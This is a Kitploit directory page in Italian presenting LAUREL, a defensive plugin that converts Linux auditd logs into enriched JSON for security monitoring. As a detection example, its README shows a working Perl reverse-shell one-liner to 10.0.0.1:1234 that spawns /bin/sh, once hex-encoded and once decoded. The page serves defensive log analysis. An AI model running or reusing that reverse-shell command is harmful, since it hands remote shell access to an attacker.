Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
laurel — Trasforma i log di audit Linux per l'utilizzo SIEM | Kitploit
Strumenti/GitHubGitHub/threathunters-io/laurel
Strumenti DifensiviAnalisi dei Log
GitHubthreathunters-io/laurel

laurel

Trasforma i log di audit Linux per l'utilizzo SIEM

Vedi Repository
851652 giorni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

logo

Linux Audit – Logging utilizzabile, robusto e semplice

Build Status

LAUREL è un plugin di post-elaborazione degli eventi per auditd(8) che genera log di audit basati su JSON utili e arricchiti, adatti per configurazioni moderne di monitoraggio della sicurezza.

La documentazione corrispondente all'ultima release stabile può essere trovata qui.

Perché?

TLDR: Invece di eventi di audit che assomigliano a questo…

root@kitploit:~
type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

…LAUREL li trasforma in log JSON dove il pasticcio che gli attaccanti/penetration tester/red teamer stanno cercando di fare diventa evidente a prima vista:

root@kitploit:~
{ … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"]}, …}

Questo accade alla fonte perché LAUREL viene eseguito sull'host dove vengono generati gli eventi di audit. Gli eventi vengono arricchiti con informazioni utili sul processo padre (ppid):

root@kitploit:~
"PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Documentazione

I dettagli di configurazione e operativi sono descritti nella pagina di manuale laurel(8). I dettagli sul formato del log e le motivazioni si trovano nella pagina di manuale laurel-about(7). La pagina laurel-audit-rules(7) contiene consigli ed esempi per configurare regole di audit utili per rilevare le tattiche degli attaccanti.

Le istruzioni di installazione di LAUREL contengono indicazioni su come compilare LAUREL dal sorgente e su come installarlo e configurarlo.

Abbiamo sviluppato LAUREL perché non eravamo soddisfatti delle caratteristiche e delle prestazioni dei progetti e prodotti esistenti. Si prega di fare riferimento al documento Performance per i dettagli.

Vedi anche

  • ansible-auditd-laurel, un ruolo Ansible per distribuire auditd + laurel, by @0xFustang / CERT-EU

Licenza

GNU General Public License, versione 3

Autori

  • Hilko Bengen <[email protected]>
  • Sergej Schmidt <[email protected]>

Il logo è stato creato da Birgit Meyer <[email protected]>.

Scarica lo strumento